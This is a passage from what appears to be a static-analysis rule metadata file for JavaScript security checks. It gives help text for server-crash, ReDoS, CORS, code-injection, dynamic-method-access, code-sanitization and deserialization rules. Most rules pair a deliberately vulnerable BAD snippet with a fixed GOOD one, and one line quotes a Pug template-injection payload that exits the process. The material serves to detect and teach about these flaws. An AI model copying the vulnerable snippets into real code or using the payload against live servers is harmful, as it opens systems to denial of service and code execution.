This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n  fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n  if (!isValidPath(rootDir, req.query.filePath)) {\n    throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n  }\n  // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n  fs.access(rootDir, (err) => {\n    if (err) {\n      console.error(\n        `Server setup is corrupted, ${rootDir} cannot be accessed!`\n      );\n      res.status(500);\n      res.end();\n      return;\n    }\n    save(rootDir, req.query.path, req.body);\n    res.status(200);\n    res.end();\n  });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n  fs.access(rootDir, (err) => {\n    // ...\n    try {\n      save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n      res.status(200);\n      res.end();\n    } catch (e) {\n      res.status(500);\n      res.end();\n    }\n  });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n  try {\n    await fs.promises.access(rootDir);\n    save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n    res.status(200);\n    res.end();\n  } catch (e) {\n    res.status(500);\n    res.end();\n  }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n","markdown":"# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n  fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n  if (!isValidPath(rootDir, req.query.filePath)) {\n    throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n  }\n  // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n  fs.access(rootDir, (err) => {\n    if (err) {\n      console.error(\n        `Server setup is corrupted, ${rootDir} cannot be accessed!`\n      );\n      res.status(500);\n      res.end();\n      return;\n    }\n    save(rootDir, req.query.path, req.body);\n    res.status(200);\n    res.end();\n  });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n  fs.access(rootDir, (err) => {\n    // ...\n    try {\n      save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n      res.status(200);\n      res.end();\n    } catch (e) {\n      res.status(500);\n      res.end();\n    }\n  });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n  try {\n    await fs.promises.access(rootDir);\n    save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n    res.status(200);\n    res.end();\n  } catch (e) {\n    res.status(500);\n    res.end();\n  }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n"},"properties":{"tags":["security","external/cwe/cwe-248","external/cwe/cwe-730"],"description":"A server that can be forced to crash may be vulnerable to denial-of-service\n              attacks.","id":"js/server-crash","kind":"path-problem","name":"Server crash","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/regex-injection","name":"js/regex-injection","shortDescription":{"text":"Regular expression injection"},"fullDescription":{"text":"User input should not be used in regular expressions without first being escaped, otherwise a malicious user may be able to inject an expression that could require exponential time on certain inputs."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n  var key = req.param(\"key\"), input = req.param(\"input\");\n\n  // BAD: Unsanitized user input is used to construct a regular expression\n  var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n  var key = req.param(\"key\"), input = req.param(\"input\");\n\n  // GOOD: User input is sanitized before constructing the regex\n  var safeKey = _.escapeRegExp(key);\n  var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n  var key = req.param(\"key\"), input = req.param(\"input\");\n\n  // BAD: Unsanitized user input is used to construct a regular expression\n  var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n  var key = req.param(\"key\"), input = req.param(\"input\");\n\n  // GOOD: User input is sanitized before constructing the regex\n  var safeKey = _.escapeRegExp(key);\n  var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-730","external/cwe/cwe-400"],"description":"User input should not be used in regular expressions without first being escaped,\n              otherwise a malicious user may be able to inject an expression that could require\n              exponential time on certain inputs.","id":"js/regex-injection","kind":"path-problem","name":"Regular expression injection","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/cors-permissive-configuration","name":"js/cors-permissive-configuration","shortDescription":{"text":"Permissive CORS configuration"},"fullDescription":{"text":"Cross-origin resource sharing (CORS) policy allows overly broad access."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Permissive CORS configuration\nA server can use CORS (Cross-Origin Resource Sharing) to relax the restrictions imposed by the Same-Origin Policy, allowing controlled, secure cross-origin requests when necessary.\n\nA server with an overly permissive CORS configuration may inadvertently expose sensitive data or enable CSRF attacks, which allow attackers to trick users into performing unwanted operations on websites they're authenticated to.\n\n\n## Recommendation\nWhen the `origin` is set to `true`, the server accepts requests from any origin, potentially exposing the system to CSRF attacks. Use `false` as the origin value or implement a whitelist of allowed origins instead.\n\nWhen the `origin` is set to `null`, it can be exploited by an attacker who can deceive a user into making requests from a `null` origin, often hosted within a sandboxed iframe.\n\nIf the `origin` value is user-controlled, ensure that the data is properly sanitized and validated against a whitelist of allowed origins.\n\n\n## Example\nIn the following example, `server_1` accepts requests from any origin because the value of `origin` is set to `true`. `server_2` uses user-controlled data for the origin without validation.\n\n\n```javascript\nimport { ApolloServer } from 'apollo-server';\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function () { });\n\nserver.on('request', function (req, res) {\n    // BAD: origin is too permissive\n    const server_1 = new ApolloServer({\n        cors: { origin: true }\n    });\n\n    let user_origin = url.parse(req.url, true).query.origin;\n    // BAD: CORS is controlled by user\n    const server_2 = new ApolloServer({\n        cors: { origin: user_origin }\n    });\n});\n```\nTo fix these issues, `server_1` uses a restrictive CORS configuration that is not vulnerable to CSRF attacks. `server_2` properly validates user-controlled data against a whitelist before using it.\n\n\n```javascript\nimport { ApolloServer } from 'apollo-server';\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function () { });\n\nserver.on('request', function (req, res) {\n    // GOOD: origin is restrictive\n    const server_1 = new ApolloServer({\n        cors: { origin: false }\n    });\n\n    let user_origin = url.parse(req.url, true).query.origin;\n    // GOOD: user data is properly sanitized\n    const server_2 = new ApolloServer({\n        cors: { origin: (user_origin === \"https://allowed1.com\" || user_origin === \"https://allowed2.com\") ? user_origin : false }\n    });\n});\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n","markdown":"# Permissive CORS configuration\nA server can use CORS (Cross-Origin Resource Sharing) to relax the restrictions imposed by the Same-Origin Policy, allowing controlled, secure cross-origin requests when necessary.\n\nA server with an overly permissive CORS configuration may inadvertently expose sensitive data or enable CSRF attacks, which allow attackers to trick users into performing unwanted operations on websites they're authenticated to.\n\n\n## Recommendation\nWhen the `origin` is set to `true`, the server accepts requests from any origin, potentially exposing the system to CSRF attacks. Use `false` as the origin value or implement a whitelist of allowed origins instead.\n\nWhen the `origin` is set to `null`, it can be exploited by an attacker who can deceive a user into making requests from a `null` origin, often hosted within a sandboxed iframe.\n\nIf the `origin` value is user-controlled, ensure that the data is properly sanitized and validated against a whitelist of allowed origins.\n\n\n## Example\nIn the following example, `server_1` accepts requests from any origin because the value of `origin` is set to `true`. `server_2` uses user-controlled data for the origin without validation.\n\n\n```javascript\nimport { ApolloServer } from 'apollo-server';\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function () { });\n\nserver.on('request', function (req, res) {\n    // BAD: origin is too permissive\n    const server_1 = new ApolloServer({\n        cors: { origin: true }\n    });\n\n    let user_origin = url.parse(req.url, true).query.origin;\n    // BAD: CORS is controlled by user\n    const server_2 = new ApolloServer({\n        cors: { origin: user_origin }\n    });\n});\n```\nTo fix these issues, `server_1` uses a restrictive CORS configuration that is not vulnerable to CSRF attacks. `server_2` properly validates user-controlled data against a whitelist before using it.\n\n\n```javascript\nimport { ApolloServer } from 'apollo-server';\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function () { });\n\nserver.on('request', function (req, res) {\n    // GOOD: origin is restrictive\n    const server_1 = new ApolloServer({\n        cors: { origin: false }\n    });\n\n    let user_origin = url.parse(req.url, true).query.origin;\n    // GOOD: user data is properly sanitized\n    const server_2 = new ApolloServer({\n        cors: { origin: (user_origin === \"https://allowed1.com\" || user_origin === \"https://allowed2.com\") ? user_origin : false }\n    });\n});\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n"},"properties":{"tags":["security","external/cwe/cwe-942"],"description":"Cross-origin resource sharing (CORS) policy allows overly broad access.","id":"js/cors-permissive-configuration","kind":"path-problem","name":"Permissive CORS configuration","precision":"high","problem.severity":"warning","security-severity":"6.0"}},{"id":"js/code-injection","name":"js/code-injection","shortDescription":{"text":"Code injection"},"fullDescription":{"text":"Interpreting unsanitized user input as code allows a malicious user arbitrary code execution."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n    var input = req.query.username;\n    var template = `\ndoctype\nhtml\nhead\n    title= 'Hello world'\nbody\n    form(action='/' method='post')\n        input#name.form-control(type='text)\n        button.btn.btn-primary(type='submit') Submit\n    p Hello `+ input\n    var fn = pug.compile(template);\n    var html = fn();\n    res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n    var input = req.query.username;\n    var template = `\ndoctype\nhtml\nhead\n    title= 'Hello world'\nbody\n    form(action='/' method='post')\n        input#name.form-control(type='text)\n        button.btn.btn-primary(type='submit') Submit\n    p Hello #{username}`\n    var fn = pug.compile(template);\n    var html = fn({username: input});\n    res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n    var input = req.query.username;\n    var template = `\ndoctype\nhtml\nhead\n    title= 'Hello world'\nbody\n    form(action='/' method='post')\n        input#name.form-control(type='text)\n        button.btn.btn-primary(type='submit') Submit\n    p Hello `+ input\n    var fn = pug.compile(template);\n    var html = fn();\n    res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n    var input = req.query.username;\n    var template = `\ndoctype\nhtml\nhead\n    title= 'Hello world'\nbody\n    form(action='/' method='post')\n        input#name.form-control(type='text)\n        button.btn.btn-primary(type='submit') Submit\n    p Hello #{username}`\n    var fn = pug.compile(template);\n    var html = fn({username: input});\n    res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-094","external/cwe/cwe-095","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Interpreting unsanitized user input as code allows a malicious user arbitrary\n              code execution.","id":"js/code-injection","kind":"path-problem","name":"Code injection","precision":"high","problem.severity":"error","security-severity":"9.3"}},{"id":"js/unsafe-dynamic-method-access","name":"js/unsafe-dynamic-method-access","shortDescription":{"text":"Unsafe dynamic method access"},"fullDescription":{"text":"Invoking user-controlled methods on certain objects can lead to remote code execution."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n  // ...\n}\nfunction pause(data) {\n  // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n    let message = JSON.parse(ev.data);\n\n    // Let the parent frame call the 'play' or 'pause' function \n    window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n  play: function(data) {\n    // ...\n  },\n  pause: function(data) {\n    // ...\n  }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n    let message = JSON.parse(ev.data);\n\n    // Let the parent frame call the 'play' or 'pause' function\n    if (!api.hasOwnProperty(message.name)) {\n      return;\n    }\n    api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n","markdown":"# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n  // ...\n}\nfunction pause(data) {\n  // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n    let message = JSON.parse(ev.data);\n\n    // Let the parent frame call the 'play' or 'pause' function \n    window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n  play: function(data) {\n    // ...\n  },\n  pause: function(data) {\n    // ...\n  }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n    let message = JSON.parse(ev.data);\n\n    // Let the parent frame call the 'play' or 'pause' function\n    if (!api.hasOwnProperty(message.name)) {\n      return;\n    }\n    api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n"},"properties":{"tags":["security","external/cwe/cwe-094"],"description":"Invoking user-controlled methods on certain objects can lead to remote code execution.","id":"js/unsafe-dynamic-method-access","kind":"path-problem","name":"Unsafe dynamic method access","precision":"high","problem.severity":"error","security-severity":"9.3"}},{"id":"js/bad-code-sanitization","name":"js/bad-code-sanitization","shortDescription":{"text":"Improper code sanitization"},"fullDescription":{"text":"Escaping code as HTML does not provide protection against code injection."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains `</script>`, then the generated code will break out of a `</script>` if inserted into a `</script>` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n    const assignment = `obj[${JSON.stringify(key)}]=42`;\n    return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n    '<': '\\\\u003C',\n    '>' : '\\\\u003E',\n    '/': '\\\\u002F',\n    '\\\\': '\\\\\\\\',\n    '\\b': '\\\\b',\n    '\\f': '\\\\f',\n    '\\n': '\\\\n',\n    '\\r': '\\\\r',\n    '\\t': '\\\\t',\n    '\\0': '\\\\0',\n    '\\u2028': '\\\\u2028',\n    '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n    return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n    const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n    return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains `</script>`, then the generated code will break out of a `</script>` if inserted into a `</script>` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n    const assignment = `obj[${JSON.stringify(key)}]=42`;\n    return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n    '<': '\\\\u003C',\n    '>' : '\\\\u003E',\n    '/': '\\\\u002F',\n    '\\\\': '\\\\\\\\',\n    '\\b': '\\\\b',\n    '\\f': '\\\\f',\n    '\\n': '\\\\n',\n    '\\r': '\\\\r',\n    '\\t': '\\\\t',\n    '\\0': '\\\\0',\n    '\\u2028': '\\\\u2028',\n    '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n    return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n    const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n    return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-094","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Escaping code as HTML does not provide protection against code injection.","id":"js/bad-code-sanitization","kind":"path-problem","name":"Improper code sanitization","precision":"high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/unsafe-deserialization","name":"js/unsafe-deserialization","shortDescription":{"text":"Deserialization of user-controlled data"},"fullDescription":{"text":"Deserializing user-controlled data may allow attackers to execute arbitrary code."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n  jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n  let data = jsyaml.load(req.params.data);\n  // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n  jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n  let data = jsyaml.safeLoad(req.params.data);\n  // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n","markdown":"# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n  jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n  let data = jsyaml.load(req.params.data);\n  // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n  jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n  let data = jsyaml.safeLoad(req.params.data);\n  // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness 